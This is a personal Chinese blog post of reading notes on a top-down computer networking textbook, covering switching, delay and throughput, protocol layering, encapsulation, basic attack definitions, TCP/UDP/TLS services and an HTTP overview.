Tremseの部屋

计网读书笔记

2025-05-18T06:00:16.000Z

#计网自顶向下读书笔记

个人笔记，没有详细记录全部内容，存在一些补充或者个人理解。存在额外内容，额外内容会特别标注。

#计算机网络和因特网

#网络核心

网络核心由由各种路由/转发设备组成。通过路由设备将各个不同的网络进行相连，使各个端系统连接。

通过网络链路和交换机传输数据有两种基本方法:分组交换和电路交换。

#分组交换

在各种网络应用中、端系统彼此交换报文。报文能够包含协议设计者需要的任何东西。报文可以执行一种控制功能，也可以包含数据，例如电子邮件数据、 JPEG 图像或 MP3 音频文件。

为了从源端系统向目的端系统发送一个报文，源将长报文划分为较小的数据块，称之为分组。在源和目的地之间，每个分组都通过通信链路和分组交换机传送。分组传输时会以其链路的最大传输速率通过。

交换机主要有两类，路由器和链路层交换机

1.存储转发传输

多数分组交换机在链路的输入端使用存储转发传输机制。存储转发传输是指在交换机能够开始向输出链路传输该分组的第一个比特之前，必须接收到整个分组。

2.排队时延和分组丢失

每台分组交换机与多条链路相连。对于每条相连的链路，该分组交换机具有一个输出缓存 (也称为输出队列) , 用于存储路由器准备发往那条链路的分组。该输出缓存在分组交换中起着重要的作用。

如果到达的分组需要传输到某条链路，但发现该链路正忙于传输其他分组，该到达分组必须在输出缓存中等待。因此，除了存储转发时延以外，分组还要承受输出缓存的排队时延。这些时延是变化的，变化的程度取决于网络的拥塞程度。因为缓存空间的大小是有限的，一个到达的分组可能发现该缓存已被其他等待传输的分组完全充满了。在此情况下，将出现分组丢失(即丢包),到达的分组或已经排队的分组之一将被丢弃。

3.转发表和路由选择协议

路由器从与它相连的一条通信链路得到分组，然后向与它相连的另一条通信链路转发该分组。但是路由器怎样决定它应当向哪条链路进行转发呢？

在因特网中，每个端系统具有一个称为IP地址的地址。当源主机要向目的端系统发送一个分组时，源在该分组的首部包含了目的地的IP地址。当一个分组到达网络中的路由器时，路由器检查该分组的目的地址的一部分，并向一台相邻路由器转发该分组。

每台路由器具有一个转发表, 用于将目的地址(或目的地址的一部分)映射成为输出链路。当某分组到达一台路由器时，路由器检查该地址，并用这个目的地址搜索其转发表，以发现适当的出链路。路由器则将分组导向该出链路。

因特网具有一些特殊的路由选择协议用于自动地设置这些转发表。具体内容在之后的章节讨论。

#电路交换

在电路交换网络中，在端系统间通信会话期间，预留了端系统间沿路径通信所需要的资源(缓存，链路传输速率)。在分组交换网络中．这些资源则不是预留的。会话的报文按需使用这些资源，其后果可能是不得不等待（即排队）接入通信线路。

传统的电话网络是电路交换网络的例子。考虑当一个人通过电话网向另一个人发送信息（语音或传真）时所发生的情况。在发送方能够发送信息之前，该网络必须在发送方和接收方之间建立一条连接。这是一个名副其实的连接，因为此时沿着发送方和接收方之间路径上的交换机都将为该连接维护连接状态。用电话的术语来说，该连接被称为一条电路。当网络创建这种电路时，它也在连接期间在该网络链路上预留了恒定的传输速率（表示为每条链路传输容量的一部分）既然已经为该发送方–接收方连接预留了带宽，则发送方能够以确保的恒定速率向接收方传送数据。

以下是一个例子：

考虑一台主机要经过分组交换网络（如因特网）向另一台主机发送分组所发生的情况。与使用电路交换相同，该分组经过一系列通信链路传输。但与电路交换不同的是，该分组被发送进网络，而不预留任何链路资源之类的东西。如果因为此时其他分组也需要经该链路进行传输而使链路之一出现拥塞，则该分组将不得不在传输链路发送侧的缓存中等待而产生时延。因特网尽最大努力以实时方式交付分组，但它不做任何保证。

1.电路交换网络中的复用

复用是为了将链路划分为多个电路以满足多个用户数据传输的需求。如上图1-13中，每条链路被划分为4条电路，就是链路的复用。

链路中的电路是通过频分复用 (FDM) 或时分复用 (TDM)来实现的。

对于 FDM, 链路的频谱由跨越链路创建的所有连接共享。特别是，在连接期间链路为每条连接专用一个频段。在电话网络中，这个频段的宽度通常为4kHz (即每秒4000 周期)。毫无疑问，该频段的宽度称为带宽。调频无线电台也使用 FDM来共享88MHz ~ 108MHz 的频谱、其中每个电台被分配一个特定的频段。

对于一条TDM链路，时间被划分为固定期间的帧，并且每个帧又被划分为固定数量的时隙。当网络跨越一条链路创建一条连接（电路）时，网络在每个帧中为该连接指定一个时隙，这些时隙专门由该连接单独使用，一个时隙（在每个帧内）可用于传输该连接的数据。

2.分组交换与电路交换的对比

电路连接不适合计算机之间的通信
连接建立的时间成本较高。
计算机之间的通信具有突发性，如果使用电路交换，则浪费的资源较多（即连接建立后就是两个端系统的专用连接，即使空闲，也不能被其他的呼叫（请求）利用。

#分组交换网中的时延，丢包和吞吐量

#分组交换网中的时延概述

分组从一台主机(源)出发，通过一系列路由器传输，在另一台主机(目的地)中结束它的历程。当分组从一个节点（主机或路由器）沿着这条路径到后继节点(主机或路由器)，该分组在沿途的每个节点经受了几种不同类型的时延。这些时延最为重要的是**节点处理时延 **、排队时延、发送时延（又称传输时延）和传播时延, 这些时延总体累加起来是节点总时延。

计算：
发送时延 = 数据帧长度(b) / 信道带宽(b/s)
传播时延 = 信道长度(m) / 电磁波在信道上的传播速率(m/s)

1.时延对的类型

处理时延 (nodal processing delay)
检查分组首部和决定将该分组导向何处所需要的时间是处理时延的一部分。处理时延也能够包括其他因素，如检查比特级别的差错所需要的时间，该差错出现在从上游节点向路由器A传输这些分组比特的过程中。高速路由器的处理时延通常是微秒或更低的数量级。在这种节点处理之后，路由器将该分组引向通往路由器B链路之前的队列。
排队时延(queuing delay)
在队列中，当分组在链路上等待传输时，它经受排队时延。实际的排队时延可以是毫秒到微秒量级。
发送时延（传输时延）( transmission delay)
假定分组以先到先服务方式传输，这在分组交换网中是常见的方式。仅当所有已经到达的分组被传输后，才能传输刚到达的分组。用L bit表示该分组的长度，用 R bps表示从路由器A到路由器B的链路传输速率。例如,对于一条10Mbps的以太网链路，速率R=10Mbps; 对于 100Mhps的以太网链路，速率R=100Mbps。传输时延是L/R。这是将所有分组的比特推向链路（即传输，或者说发射）所需要的时间。实际的传输时延通常在毫秒到微秒量级。
传播时延(propagation delay)
数据从该链路的起点到目的地传播所需要的时间是传播时延。该传播速率取决于该链路的物理媒体，等于或略小于光速。

#排队时延和丢包

1.排队时延

令a表示分组到达队列的平均速率 (a 的单位是分组/秒，即pkt/s) ，R bps是传输速率，为了简单起见，也假定所有分组都是由L bit组成的。则比特到达队列的平均速率是La bps。最后，假定该队列非常大，因此它基本能容纳无限数量的比特。比率La/R被称为流量强度。它在估计排队时延的范围方面经常起着重要的作用。

若流量强度>1, 则比特到达队列的平均速率超过从该队列传输出去的速率。在这种情况下，该队列趋向于无限增加，并且排队时延将趋向无穷大。因此，流量工程中的一条铁律是：设计系统时流量强度不能大于1。

随着流量强度接近1，平均排队时延迅速增加。该强度的少量增加将导致时延大比例增加。

2.丢包

一条链路前的队列只有有限的容量。因为该排队容量是有限的，随着流量强度接近1, 到达的分组将发现一个满的队列。由于没有地方存储这个分组，路由器将丢弃该分组。

#计算机网络中的吞吐量

除了时延和丢包，计算机网络中另一个至关重要的性能测度是端到端吞吐量。

为了定义吞吐量，考虑从主机A到主机B跨越计算机网络传送一个大文件，在任何瞬间的瞬时吞吐量是主机B接收到该文件的速率(bps)。如果该文件由 F 比特组成，主机B接收到所有F比特用时T秒，则文件传送的平均吞吐量是F/T bps。

对于一个链路传输，其吞吐量是瓶颈链路的传输速率，即连接两端的所有链路中，传输速率最小的链路的传输速率。

#协议层次及其服务模型

#分层的体系结构

1.协议分层

为了给网络协议的设计提供一个结构，网络设计者以分层的方式组织协议以及实现这些协议的网络硬件和软件，每个协议属于这些层次之一。某层向它的上一层提供的服务, 即所谓一层的服务模型 。

每层通过在该层中执行某些动作或使用直接下层的服务来提供服务。例如，由第n层提供的服务可能包括报文从网络的一边到另一边的可靠交付。这可能是通过使用第n-1层的边缘到边缘的不可靠报文传送服务，加上第n层的检测和重传丢失报文的功能来实现的。

一个协议层能够用软件、硬件或两者的结合来实现。诸如 HTTP和SMTP这样的应用层协议几乎总是在端系统中用软件实现，运输层协议也是如此。物理层和数据链路层负责处理跨越特定链路的通信，它们通常在与给定链路相关联的网络接口卡（例如以太网或WiFi 接口卡）中实现。网络层经常是硬件和软件实现的混合体。

还要注意的是，一个第 n 层协议也分布在构成该网络的端系统、分组交换机和其他组件中。这就是说，第n层协议的不同部分常常位于这些网络组件的各部分中。

协议分层具有概念化和结构化的优点。如我们看到的那样，分层提供了一种结构化方式来讨论系统组件，模块化使更新系统组件更为容易。

各层的所有协议被称为协议栈。

1.1因特网协议栈

因特网的协议栈由5个层次组成：物理层、链路层、网络层、运输层和应用层。

本书的“自顶向下”既是“以因特网协议栈的层次从上往下”的意思

5.应用层

应用层是网络应用程序及它们的应用层协议存留的地方。因特网的应用层包括许多协议，例如HTTP (它提供了Web文档的请求和传送)、SMTP (它提供了电子邮件报文的传输)和FTP (它提供两个端系统之间的文件传送)。我们将看到，某些网络功能，如将像 www. ietf. org 这样对人友好的端系统名字转换为32比特的网络地址(域名解析)，也是借助于特定的应用层协议即域名系统(DNS)完成的。

应用层协议分布在多个端系统上，而一个端系统中的应用程序使用协议与另一个端系统中的应用程序交换信息分组。我们把这种位于应用层的信息分组就是常常提及的报文。

4.运输层

因特网的运输层在应用程序端点之间传送应用层报文。在因特网中，有两种运输协议，即TCP和UDP, 利用其中的任一个都能运输应用层报文。

TCP 向它的应用程序提供了面向连接的服务。这种服务包括了应用层报文向目的地的确保传递和流量控制(即发送方/接收方速率匹配)。TCP也将长报文划分为短报文，并提供拥塞控制机制，因此当网络拥塞时，源抑制其传输速率。

UDP协议向它的应用程序提供无连接服务。这是一种不提供不必要服务的服务，没有可靠性，没有流量控制，也没有拥塞控制。

粗略的说，TCP协议更可靠，相对资源要求也更高(数据大小，时延等)。UDP则反之。

在本书中，我们把运输层的分组称为报文段。

3.网络层

网络层负责将网络层分组从一台主机移动到另一台主机，网络层分组称为数据报。在一台源主机中的运输层协议 (TCP或UDP) 向网络层递交报文段和目的地址。

网络层包括著名的网际协议IP, 该协议定义了在数据报中的各个字段以及端系统和路由器如何作用于这些字段。一个端系统的IP仅有一个，所有具有网络层的因特网组件必须运行IP。因特网的网络层也包括决定路由的路由选择协议，它根据该路由将数据报从源传输到目的地。

尽管网络层包括了其他网际协议和一些路由选择协议，但通常把它简单地称为IP层，这反映了 IP是将因特网连接在一起的黏合剂这样的事实。

2.链路层

为了将分组从一个节点(主机或路由器)移动到路径上的下一个节点，网络层必须依靠该链路层的服务。特别是在每个节点，网络层将数据报下传给链路层，链路层沿着路径将数据报传递给下一个节点。在该下一个节点，链路层将数据报上传给网络层。

由链路层提供的服务取决于应用于该链路的特定链路层协议。例如，某些协议基于链路提供可靠传递，从传输节点跨越一条链路到接收节点。

值得注意的是，这种可靠的传递服务不同于TCP的可靠传递服务，TCP提供从一个端系统到另一个端系统的可靠交付。链路层的例子包括以太网、 WiFi和电缆接入网的DOCSIS协议。因为数据报从源到目的地传送通常需要经过几条链路，一个数据报可能被沿途不同链路上的不同链路层协议处理。例如，一个数据报可能被一段链路上的以太网和下一段链路上的PPP所处理。网络层将受到来自每个不同的链路层协议的不同服务。在本书中，我们把链路层分组称为帧。

1.物理层

虽然链路层的任务是将整个帧从一个网络元素移动到邻近的网络元素，而物理层的任务是将该帧中的一个个比特从一个节点移动到下一个节点。

1.2 OSI模型

OSI模型即是开放系统互连模型，其参考模型有七层：应用层、表示层、会话层、运输层、网络层、数据链路层和物理层。

这些层次中， 5层的功能大致与它们名字类似的因特网对应层的功能相同。所以，我们来考虑OSI参考模型中附加的两个层，即表示层和会话层。表示层的作用是使通信的应用程序能够解释交换数据的含义。这些服务包括数据压缩和数据加密(它们是自解释的)以及数据描述(这使得应用程序不必担心在各台计算机中表示／存储的内部格式不同的问题)。会话层提供了数据交换的定界和同步功能，包括了建立检查点和恢复方案的方法。

#封装

上图显示了这样一条物理路径：数据从发送端系统的协议栈向下，沿着中间的链路层交换机和路由器的协议栈上上下下，然后向上到达接收端系统的协议栈。

路由器和链路层交换机都是分组交换机，与端系统类似，路由器和链路层交换机以多层次的方式组织它们的网络硬件和软件。而路由器和链路层交换机并不实现协议栈中的所有层次。如图所示，链路层交换机实现了第一层和第二层；路由器实现了第一层到第三层。这意味着因特网路由器能够实现IP协议，而链路层交换机则不能。尽管链路层交换机不能识别IP地址，但它们能够识别第二层地址，如以太网地址。值得注意的是，主机实现了所有5个层次，这与因特网体系结构将它的复杂性放在网络边缘的观点是一致的。

上图也说明了一个重要概念：封装。在发送主机端，一个应用层报文(图中的M) 被传送给运输层。在最简单的情况下，运输层收取到报文并附上附加信息(所谓运输层首部信息，图中的H_t)该首部将被接收端的运输层使用。应用层报文和运输层首部信息一道构成了运输层报文段。运输层报文段因此封装了应用层报文。附加的信息也许包括了下列信息：允许接收端运输层向上向适当的应用程序交付报文的信息；差错检测位信息，该信息让接收方能够判断报文中的比特是否在途中已被改变。运输层则向网络层传递该报文段，网络层增加了如源和目的端系统地址等网络层首部信息（图中的H_n)生成了网络层数据报。该数据报接下来被传递给链路层，链路层增加它自己的链路层首部信息并生成链路层帧。所以我们看到，在每一层，一个分组具有两种类型的字段： 首部字段(头)和有效载荷字段。有效载荷通常是来自上一层的分组。

封装的过程能够比前面描述的更为复杂。例如，一个大报文可能被划分为多个运输层的报文段(这些报文段每个又可能被划分为多个网络层数据报)。在接收端，则必须从其连续的数据报中重构这样一个报文段。

#面对攻击的网络

病毒
病毒是一种需要某种形式的用户交互来感染用户设备的恶意软件。
蠕虫
蠕虫是一种无须任何明显用户交互就能进入设备的恶意软件。
Dos,拒绝服务攻击
DoS攻击使得网络、主机或其他基础设施部分不能由合法用户使用。大多数因特网DoS攻击属于下列三种类型之一：
- 弱点攻击
  即针对对方的漏洞进行攻击
- 带宽洪泛
  攻击者向目标主机发送大量的分组，分组数量之多使得目标的接入链路变得拥塞，使得合法的分组无法到达服务器。
- 连接洪泛
  攻击者在目标主机中创建大量的半开或全开TCP连接，该主机因这些伪造的连接而陷入困境，并停止接受合法的连接。
下图所示的即是分布式DoS（DDoS），攻击者控制多个源并让每个源向目标猛烈发送流量。

分组嗅探
在无线传输设备的附近放置一台被动的接收机，该接收机就能得到传输的每个分组的副本。这些分组包含了各种敏感信息，包括口令、社会保险号、商业秘密和个人信息等。记录每个流经的分组副本的被动接收机被称为分组嗅探器（wireshark就是其中之一）。
由于分组嗅探是被动的，它并不会在信道中注入其他分组，所以基本无法检测其存在。所以我们才要加密数据。
IP欺诈
具有虚假源地址的分组注入因特网的能力被称为IP哄骗, 而它只是一个用户能够冒充另一个用户的许多方式中的一种。为了解决这个问题，我们需要采用端点鉴别，即一种使我们能够确信一个报文源自我们认为它应当来自的地方的机制（比如http请求中的remote_addr)。

#应用层

#网络应用原理

研发网络应用程序的核心是写出能够运行在不同的端系统和通过网络彼此通信的程序。

例如,在Web应用程序中,有两个互相通信的不同的程序: 一个是运行在用户主机(桌面机、膝上机、平板电脑、智能电话等) 上的浏览器程序,另一个是运行在Web服务器主机。

网络核心设备并不在应用层上起作用,而仅在较低层起作用,特别是在网络层及以下层次起作用。将应部用软件限制在端系统的方法,促进了大量的网络应用程序的迅速研发和部署(因为不用考虑下层了)。

#网络应用体系

当进行软件编码之前,应当对应用程序有一个宽泛的体系结构计划。应用程序的体系结构明显不同于网络的体系结构(例如在第1章中所讨论的5层因特网体系结构)。

从应用程序研发者的角度看,网络体系结构是固定的,并为应用程序提供了特定的服务集合

另外,应用体系结构由应用程序研发者设计,规定了如何在各种端系统上组织该应用程序。在选择应用程序体系结构时,应用程序研发者很可能利用现代网络应用程序中所使用的两种主流体系结构之一:客户-服务器体系结构或对等(P2P)体系结构。

客户-服务器体系结构

在客户-服务器体系结构中,有一个总是打开的主机,称为服务器,它服务于来自许多其他称为客户的主机。值得注意的是,客户-服务器体系结构下,客户相互之间不直接通信。

客户-服务器体系结构的另一个特征是该服务器具有固定的、周知的地址,该地址称为IP地址。

在一个客户-服务器应用中,常常会出现一台单独的服务器主机跟不上它所有客户请求的情况。例如,一个流行的社交网络站点如果仅有一台服务器来处理所有请求,将很快变得不堪重负。为此,托管大量主机的数据中心常被用于创建强大的虚拟服务器，用以满足客户需求。

P2P体系结构

在P2P体系结构中,对位于数据中心的专用服务器有最小的(或者没有)依赖。相反,应用程序在间断连接的主机对之间使用直接通信,这些主机对被称为对等方。这些对等方并不为服务提供商所有,而是为用户的台式机和笔记本电脑所控制。因为这种对等方通信不必通过专门的服务器,该体系结构被称为对等方到对等方的。流行的P2P应用的例子是文件共享应用BitTorrent。

P2P体系结构的特性之一是其自扩展性。例如,在一个P2P文件共享应用中,尽管每个对等方都由于请求文件产生工作负载,但每个对等方通过向其他对等方分发文件也为系统整体增加服务能力。P2P体系结构也是有成本效率的,因为它通常不需要庞大的服务器基础设施和服务器带宽。然而,未来P2P应用由于高度非集中式结构,面临安全性、性能和可靠性等挑战。

#进程通信

在构建网络应用程序前,还需要对程序如何运行在多个端系统上以及程序之间如何相互通信有基本了解。用操作系统的术语来说,进行通信的实际上是进程而不是程序。

一个进程可以被认为是运行在端系统中的一个程序。
当多个进程运行在相同的端系统上时,它们使用进程间通信机制相互通信。
进程间通信的规则由端系统上的操作系统确定。

而在本书中,我们并不特别关注同一台主机上的进程间通信,而关注运行在不同端系统(可能具有不同的操作系统)上的进程间通信。

在两个不同端系统上的进程,通过跨越计算机网络交换报文而相互通信。发送进程生成并向网络中发送报文;接收进程接收这些报文并可能通过回送报文进行响应。

1.客户和服务器进程

网络应用程序由成对的进程组成,这些进程通过网络相互发送报文。

例如,在Web应用程序,一个客户浏览器进程与一个Web服务器进程交换报文。在一个P2P文件共享系统, 文件从一个对等方中的进程传输到另一个对等方中的进程。对每对通信进程,我们通常将这两个进程之一为客户,而另一个进程为服务器。对于Web而言,浏览器是一个客户进程,Web服务器是一个服务器进程。对于P2P文件共享,下载文件的对等方为客户,上载文件的对等方为服务器。

客户和服务器进程的定义如下:在一对进程之间的通信会话场景,发起通信(即在该会话开始时发起与其他进程的联系)的进程为客户进程,在会话开始时等待联系的进程为服务器进程。

2. 进程与计算机网络之间的接口

如上所述,多数应用程序由通信进程对组成,每对中的两个进程相互发送报文。从一个进程向另一个进程发送的报文必须通过下面的网络。进程通过一个称为套接字的软件接口向网络发送报文和从网络接收报文。

下图显示了两个经过因特网通信的进程之间的套接字通信(假定由该进程使用的运输层协议是TCP协议)。如该图所示,套接字是同一台主机内应用层与运输层之间的接口。由于该套接字是建立网络应用程序的可编程接口,因此套接字也称为应用程序和网络之间的应用编程接口(API)。应用程序开发者可以控制套接字在应用层端的一切,但是对该套接字的运输层端几乎没有控制权。

应用程序开发者对于运输层的控制仅限于：

选择运输层协议
可能能设定几个运输层参数,如最大缓存和最大报文段长度

3. 进程寻址

为了向特定目的地发送邮政邮件,目的地需要有一个地址。类似地,在一台主机上运行的进程为了向另一台主机上运行的进程发送分组,接收进程需要有一个地址。为了标识该接收进程,需要定义两种信息：

主机的地址(因特网中就是IP地址)
目标主机中指定接收进程的标识符

除了知道报文发送目的地的主机地址,发送进程还必须指定运行在接收主机上的接收进程。因为一般而言一台主机能够运行许多网络应用,所以这些信息是必要的。目的地端口号用于这个目的。常用的应用有固定的端口号,如Web服务器用端口号80来标识。邮件服务器进程(使用SMTP协议)用端口号25来标识。

用于所有因特网标准协议的周知端口号的列表能够在www.iana.org处找到

#可供应用程序使用的运输服务

包括因特网在内的很多网络提供了不止一种运输层协议。当开发一个应用时,必须选择一种可用的运输层协议。如何做出这种选择呢?最可能的方式是,通过研究这些可用的运输层协议所提供的服务,选择一个最能为你的应用需求提供恰当服务的协议。

我们大体能够从四个方面对应用程序服务要求进行分类:

可靠数据传输
吞吐量
定时
安全性

1. 可靠数据传输

分组在计算机网络中可能丢失。例如,分组能够使路由器中的缓存溢出,或者当分组中的某些比特损坏后可能被丢弃。

因此,为了支持这些应用,必须做一些工作以确保由应用程序的一端发送的数据正确并完全地交付给该应用程序的另一端。如果一个协议提供了这样的确保数据交付服务,就认为提供了可靠数据传输。

运输层协议能够潜在地向应用程序提供的一个重要服务就是进程到进程的可靠数据传输。当一个运输协议提供这种服务,发送进程只要将其数据传递进套接字,就可以完全相信该数据将能无差错地到达接收进程。

当一个运输层协议不提供可靠数据传输时,由发送进程发送的某些数据可能到达不了接收进程。这可能能被容忍丢失的应用所接受,最值得注意的是多媒体应用,如交谈式音频/视频,它能够承受一定量的数据丢失。在多媒体应用中,丢失的数据会引起播放的音频/视频出现小干扰,而不是致命的损伤。

2. 吞吐量

具有吞吐量要求的应用程序被称为带宽敏感的应用。许多当前的多媒体应用是带宽敏感的,尽管某些多媒体应用可能采用自适应编码技术对数字语音或视频以与当前可用带宽相匹配的速率进行编码。

带宽敏感的应用具有特定的吞吐量要求,而弹性应用能够根据当时可用的带宽或多或少地利用可供使用的乔吐量。电子邮件、文件传输以及Web传送都属于弹性应用。

3. 定时

运输层协议也能提供定时保证。如同具有吞吐量保证那样,定时保证能够以多种形式实现。一个保证的例子如:发送方注入套接字中的每个比特到达接收方的套接字不迟于100ms。

交互式实时应用程序对于定时有较高要求，对于非实时的应,较低的时延总比较高的时延好,但对端到端的时延没有严格的约束。

4. 安全性

运输协议能够为应用程序提供一种或多种安全性服务。例如,在发送主机中,运输协议能够加密由发送进程传输的所有数据；在接收主机中,运输协议能够在将数据交付给接收进程之前解密这些数据。这种服务将在发送和接收进程之间提供机密性,以防数据以某种方式在这两个进程之间被观察。运输协议还能提供除了机密性以外的其他安全性服务,包括数据完整性和端点鉴别等。

#因特网提供的运输服务

我们已经考虑了计算机网络能够提供的通用运输服务。现在我们要更为具体地考察由因特网提供的运输服务类型。因特网(更一般的是TCP/IP网)为应用程序提供两个运输层协议,即TCP和UDP。

1. TCP服务

TCP服务模型包括面向连接服务和可靠数据传输服务。当某个应用程序调用TCP作为其运输协议时,该应用程序就能获得来自TCP的这两种服务。

面向连接的服务:在应用层数据报文开始流动之前,TCP让客户和服务器相互交换运输层控制信息。这个所谓的握手过程提醒客户和服务器,让它们为大量分组的到来做好准备。在握手阶段后,一个TCP连接就在两个进程的套接字之间建立了。这条连接是全双工的,即连接双方的进程可以在此连接上同时进行报文收发。当应用程序结束报文发送时,必须拆除该连接。
可靠的数据传输服务:通信进程能够依靠TCP,无差错、按适当顺序交付所有发送的数据。当应用程序的一端将字节流传进套接字时,它能够依靠TCP将相同流交付给接收方的套接,而没有字节的丢失和冗余。

TCP还具有拥塞控制机制,这种服务不一定能直接为通信进程带来好处,但对因特网整体有利。当发送方和接收方之间的网络出现拥塞时,TCP的拥塞控制机制会抑制发送进程(客户或服务器)。

EX. TCP安全
无论TCP还是UDP都没有提供任何加密机制,这就是说发送进程传进其套接字的数据,与经网络传送到目的进程的数据相同。因此,举例来说,如果某发送进程以明文方式发送了一个口令进入它的套接字,该明文口令将经过发送方与接收方之间的所有链路传送,这就可能在任何中间链路被嗅探和发现。
因为隐私和其他安全问题对许多应用而言已经成为至关重要的问题,所以因特网界已经研制了TCP的“强化模块”,称为运输层安全(TLS)。用TLS加强后的TCP不仅能够做传统的TCP所能做的一切,而且提供了关键的进程到进程的安全性服务,包括加密、数据完整性和端点鉴别。
注意，TLS并不是因特网运输层传输协议，它只是一种对TCP的加强，这种加强是在应用层实现的。
TLS有它自己的套接字API,这类似于传统的TCP套接字API。当一个应用使用TLS时,发送进程向TLS套接字传递明文数据;发送主机中的TLS则加密该数据,并将加密的数据传递给TCP套接字。加密的数据经因特网传送到接收进程中的TCP套接字。该接收套接字将加密数据传递给TLS,由其进行解密。最后,TLS通过它的TLS套接字将明文数据传递给接收进程。

2. UDP服务

UDP是一种不提供不必要服务的轻量级运输协议,它仅提供最低限度的服务。

UDP是无连接的,因此在两个进程通信前没有握手过程。UDP提供一种不可靠数据传输服务,也就是说,当进程将一个报文发送进UDP套接字时,UDP并不保证该报文将到达接收进程。不仅如此,到达接收进程的报文也可能是乱序到达的。

UDP不包括拥塞控制机制,所以UDP的发送端可以用它选定的任何速率向其下层(网络层)注入数据。(然而,值得注意的是实际端到端吞吐量可能小于该速率,这可能是由中间链路的带宽受限或拥塞而造成的。)

3. 因特网运输协议所不提供的服务

TCP提供了可靠的端到端数据传输。并且我们也知道TCP在应用层可以很容易地用TLS来加强以提供安全服务。所以运输协议服务中的可靠数据传输和安全性都可以得到满足

今天的因特网通常能够为时间敏感应用提供满意的服务,但它不能提供任何定时或知吐量保证。

下图给出了一些流行的因特网应用所使用的运输协议。可以看到,电子邮件、远程终端访问、Web、文件传输都使用了TCP。这些应用选择TCP的最主要原因是TCP提供了可靠数据传输服务,确保所有数据最终到达目的。因为因特网电话应用(如Skype)通常能够容忍某些丢失但要求达到一定的最小速率才能有效工,所以因特网电话应用的开发者通常愿意将该应用运行在UDP上,从而设法避开TCP的拥塞控制机制和分组开销。但因为许多防火墙被配置成阻挡(大多数类型的)UDP流量,所以因特网电话应用通常被设计成如果UDP通信失败就使用TCP作为备选项。

#应用层协议

我们刚刚学习了通过把报文发送进套接字实现网络进程间的互相通信。那么如何构造这些报文?在这些报文中,各个字段的含义是什么?进程何时发送这些报文?这些问题将我们带进应用层协议的范围。

应用层协议(application-layer protocol)定义了运行在不同端系统上的应用程序进程如何相互传递报文。特别是应用层协议定义了以下内容:

交换的报文类型,例如请求报文和响应报文。
各种报文类型的语法,如报文中的各个字段及这些字段是如何描述的。
字段的语义,即这些字段中信息的含义。
确定一个进程何时以及如何发送报文,对报文进行响应的规则。

有些应用层协议是由RFC文档定义的,因此它们位于公共域中。例如,Web的应用层协议HTTP(超文本传输协议[RFC 7230])就作为一个RFC可供使用。如果浏览器开发者遵从HTTP RFC规则,所开发出的浏览器就能访问任何遵从该文档标准的Web服务器并获取相应Web页面。还有很多别的应用层协议是专用的,有意不为公共域所用。例如,Skype使用了专用的应用层协议。

区分网络应用和应用层协议是很重要的。应用层协议只是网络应用的一部分(尽管它是应用非常重要的一部分)。例如，Web是一种客户-服务器应用,它允许客户按照需求从Web服务器获得文档。该Web应用有很多组成部分,包括文档格式的标准(即HIML)、Web浏览器(如Chrome和Microsoft Internet Explorer)、Web服务器(如Apache、Microsoft服务器程序),以及一个应用层协议。Web的应用层协议是HITP,它定义了在浏览器和Web服务器之间传输的报文格式和序列。因此,HTTP只是Web应用的一个部分(尽管是重要部分)。

#Web和HTTP

#HTTP概述

Web的应用层协议是超文本传输协议(HyperText Transfer Protocol,HTTP),它是Web的核心。HTTP由两个程序实现:一个客户程序和一个服务器程序。客户程序和服务器程序运行在不同的端系统中通过交换HTTP报文进行会话。HTTP定义了这些报文的结构以及客户和服务行报文交换的方式。在详细解释HITP之前,先了解一些Web术语。

Web页面(Web page)（也叫文档）是由对象组成的。一个对象(object)只是一个文件,诸如一个HIML文件、一个JPEG图形、一个JavaScript文件、一个CCS样式表文件或一个视频片段,它们可通过一个URL寻址。多数Web页面含有一个HTML基本文件(base HTML file)以及几个引用对象。例如,如果一个Web页面包含HTML文本和5个JPEGC图形,那么这个Web页面有6个对象:一个HTML基本文件和5个图形。HTML基本文件通过对象的URL引用页面中的其他对象。每个URL由两部分组:存放对象的服务器主机和名和对象的路径。例如,一个URL为http:www.someSchool.edu/ysomeDepartment/picture.gif,其中的www.someSchool.edu就是主机名,/someDepartment/picture.gif就是路径名。因为Web浏览器(Web browser)实现了HTTP的客户端,所以在Web环境中我们经常交换使用浏览器和客户这两个术语。Web服务器(Webserver)实现了HTTP的服务器端,它用于存储Web对象,每个对象由URL寻址。流行的Web服务器有Apache和Nginx等。

HTTP定义了Web客户向Web服务器请求Web页面的方式,以及服务器向客户传送Web页面的方式。我们稍后详细讨论客户和服务器的交互过程,而其基本思想在下图中进行了图示。当用户请求一个Web页面(如点击一个超链接)时浏览器向服务器发出对该页面中所包含对象的HTTP请求报文,服务器接收到请求并用包含这些对象的HTTP响应报文进行啊应。

HTTP使用TCP作为它的支撑运输协议(而不是在UDP上运行)。HTTP客户首先发起一个与服务器的TCP连接。一旦连接建立,该浏览器和服务器进程就可以通过套接字接口访问TCP。

客户向它的套接字接口发送HTTP请求报文并从它的套接字接口接收HTTP响应报文。类似,服务器从它的套接字接口接收HTTP请求报文并向它的套接字接口发送HTTP响应报文。一旦客户向它的套接字接口发送了一个请求报文,该报文就脱离了客户控制并进入TCP的控制。

TCP为HTTP提供可靠数据传输服务。这意味着,一个客户进程发出的每个HTTP请求报文最终能完整地到达服务器;类似,服务器进程发出的每个HTTP响应报文最终能完整地到达客户。这里我们看到了分层体系结构最大的优点,即HTTP不用担心数据丢失,也不关注TCP从网络的数据委失和乱序故障中恢复的细节。那是TCP以及协议栈较低层协议的工作。

需要注意:服务器向客户发送被请求的文件,而不存储任何关于该客户的状态信息。假如某个特定的客户在短短的几秒内两次请求同一个对象,服务器并不会因为刚刚为该客户提供了该对象就不再做出反应,而是重新发送该对象。因为HTTP服务器并不保存关于客户的任何信息,所以我们说HTTP是一个无状态协议（stateless protocol）。我们同时也注意到Web使用了客户服务器应用程序体系结构。Web服务器总是打开的,具有一个固定的IP地址,且它服务于可能来自数以百万计的不同浏览器的请求。

HTTP的初始版本称为HTTP/1.0,其可追溯到20世纪90年代早期[RFC1945]。到2020年为止,绝大部分的HTTP事务都采用HTTPZ1.1[RFC7230]。然而,越来越多的浏览器和Web服务器也支持新版的HTTP,称为HPTP/2.0[RFC7540]。在本节结束时,将给出HTTP/2.0的简介。

#非持续连接和持续链接

在许多因特网应用程序中,客户和服务器在一个相当长的时间范围内通信,在此期间,客户发出一系列请求,并且服务器对每个请求进行响应。依据应用程序以及该应用程序的使用方式,这一系列请求可以以规则的间隔周期性地或者间断性地一个接一个发出。

当每个请求/响应对是经一个单独的TCP连接发送，则该应用程序被称为使用非持续连接(non-persistentconnection)。
当所有的请求及其响应经相同的TCP连接发送，则该应用程序被称为使用持续连接(persistentconnection)。

